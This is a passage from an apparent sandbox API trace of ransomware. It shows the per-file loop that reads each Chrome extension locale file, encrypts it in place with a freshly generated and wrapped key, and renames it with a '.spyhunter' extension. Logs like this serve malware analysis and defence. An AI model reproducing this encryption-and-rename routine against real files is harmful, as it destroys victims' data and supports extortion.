data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.533] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0134.533] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.534] GetProcessHeap () returned 0x2c0000 [0134.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.534] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf49c*=0x102, lpOverlapped=0x0) returned 1 [0134.535] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.535] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x25cf49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf49c*=0x102, lpOverlapped=0x0) returned 1 [0134.535] GetProcessHeap () returned 0x2c0000 [0134.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.535] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.535] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf49c, lpOverlapped=0x0 | out: lpBuffer=0x25cf4dc*, lpNumberOfBytesWritten=0x25cf49c*=0x4, lpOverlapped=0x0) returned 1 [0134.535] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf49c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf49c*=0x30, lpOverlapped=0x0) returned 1 [0134.535] CloseHandle (hObject=0xec) returned 1 [0134.535] GetProcessHeap () returned 0x2c0000 [0134.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.536] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.spyhunter") returned 166 [0134.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0134.536] GetProcessHeap () returned 0x2c0000 [0134.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.536] GetProcessHeap () returned 0x2c0000 [0134.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.536] GetProcessHeap () returned 0x2c0000 [0134.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18a90 | out: hHeap=0x2c0000) returned 1 [0134.538] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4d8 | out: pbBuffer=0x25cf4d8) returned 1 [0134.538] GetProcessHeap () returned 0x2c0000 [0134.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.538] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4d0*=0x30) returned 1 [0134.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.538] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0134.538] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.539] GetProcessHeap () returned 0x2c0000 [0134.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.539] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf494*=0x119, lpOverlapped=0x0) returned 1 [0134.540] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.540] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x25cf494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf494*=0x119, lpOverlapped=0x0) returned 1 [0134.540] GetProcessHeap () returned 0x2c0000 [0134.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.540] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.540] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf494, lpOverlapped=0x0 | out: lpBuffer=0x25cf4d4*, lpNumberOfBytesWritten=0x25cf494*=0x4, lpOverlapped=0x0) returned 1 [0134.540] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf494, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf494*=0x30, lpOverlapped=0x0) returned 1 [0134.540] CloseHandle (hObject=0xec) returned 1 [0134.540] GetProcessHeap () returned 0x2c0000 [0134.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.540] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.spyhunter") returned 166 [0134.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0134.541] GetProcessHeap () returned 0x2c0000 [0134.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.541] GetProcessHeap () returned 0x2c0000 [0134.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.541] GetProcessHeap () returned 0x2c0000 [0134.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18470 | out: hHeap=0x2c0000) returned 1 [0134.543] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4d0 | out: pbBuffer=0x25cf4d0) returned 1 [0134.543] GetProcessHeap () returned 0x2c0000 [0134.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.543] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4c8*=0x30) returned 1 [0134.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.543] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0134.543] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.543] GetProcessHeap () returned 0x2c0000 [0134.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.543] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf48c*=0x125, lpOverlapped=0x0) returned 1 [0134.544] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.545] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x25cf48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf48c*=0x125, lpOverlapped=0x0) returned 1 [0134.545] GetProcessHeap () returned 0x2c0000 [0134.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.545] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.545] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf48c, lpOverlapped=0x0 | out: lpBuffer=0x25cf4cc*, lpNumberOfBytesWritten=0x25cf48c*=0x4, lpOverlapped=0x0) returned 1 [0134.545] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf48c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf48c*=0x30, lpOverlapped=0x0) returned 1 [0134.545] CloseHandle (hObject=0xec) returned 1 [0134.545] GetProcessHeap () returned 0x2c0000 [0134.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.545] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.spyhunter") returned 166 [0134.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0134.546] GetProcessHeap () returned 0x2c0000 [0134.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.546] GetProcessHeap () returned 0x2c0000 [0134.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.546] GetProcessHeap () returned 0x2c0000 [0134.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f18160 | out: hHeap=0x2c0000) returned 1 [0134.548] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4c8 | out: pbBuffer=0x25cf4c8) returned 1 [0134.548] GetProcessHeap () returned 0x2c0000 [0134.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4c0*=0x30) returned 1 [0134.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.548] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0134.548] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.549] GetProcessHeap () returned 0x2c0000 [0134.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.549] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf484, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf484*=0x102, lpOverlapped=0x0) returned 1 [0134.550] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.550] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x25cf484, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf484*=0x102, lpOverlapped=0x0) returned 1 [0134.550] GetProcessHeap () returned 0x2c0000 [0134.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.550] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.550] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf484, lpOverlapped=0x0 | out: lpBuffer=0x25cf4c4*, lpNumberOfBytesWritten=0x25cf484*=0x4, lpOverlapped=0x0) returned 1 [0134.550] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf484, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf484*=0x30, lpOverlapped=0x0) returned 1 [0134.550] CloseHandle (hObject=0xec) returned 1 [0134.551] GetProcessHeap () returned 0x2c0000 [0134.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.551] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.spyhunter") returned 166 [0134.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0134.551] GetProcessHeap () returned 0x2c0000 [0134.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.551] GetProcessHeap () returned 0x2c0000 [0134.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.552] GetProcessHeap () returned 0x2c0000 [0134.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f17e50 | out: hHeap=0x2c0000) returned 1 [0134.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4c0 | out: pbBuffer=0x25cf4c0) returned 1 [0134.553] GetProcessHeap () returned 0x2c0000 [0134.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4b8*=0x30) returned 1 [0134.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.554] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json") returned 156 [0134.554] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.554] GetProcessHeap () returned 0x2c0000 [0134.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.554] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf47c*=0x105, lpOverlapped=0x0) returned 1 [0134.555] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.555] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x25cf47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf47c*=0x105, lpOverlapped=0x0) returned 1 [0134.555] GetProcessHeap () returned 0x2c0000 [0134.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.555] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.555] WriteFile (in: hFile=0xec, lpBuffer=0x25cf4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf47c, lpOverlapped=0x0 | out: lpBuffer=0x25cf4bc*, lpNumberOfBytesWritten=0x25cf47c*=0x4, lpOverlapped=0x0) returned 1 [0134.555] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf47c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf47c*=0x30, lpOverlapped=0x0) returned 1 [0134.556] CloseHandle (hObject=0xec) returned 1 [0134.557] GetProcessHeap () returned 0x2c0000 [0134.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0134.557] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.spyhunter") returned 166 [0134.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.spyhunter")) returned 1 [0134.557] GetProcessHeap () returned 0x2c0000 [0134.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0134.558] GetProcessHeap () returned 0x2c0000 [0134.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0134.558] GetProcessHeap () returned 0x2c0000 [0134.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82b18 | out: hHeap=0x2c0000) returned 1 [0134.559] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf4b8 | out: pbBuffer=0x25cf4b8) returned 1 [0134.559] GetProcessHeap () returned 0x2c0000 [0134.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0134.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf4b0*=0x30) returned 1 [0134.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0134.559] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json") returned 156 [0134.559] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.560] GetProcessHeap () returned 0x2c0000 [0134.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0134.560] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf474*=0x108, lpOverlapped=0x0) returned 1 [0134.561] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.561] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x25cf474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf474*=0x108, lpOverlapped=0x0) returned 1 [0134.561] GetProcessHeap () returned 0x2c0000 [0134.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0134.561] 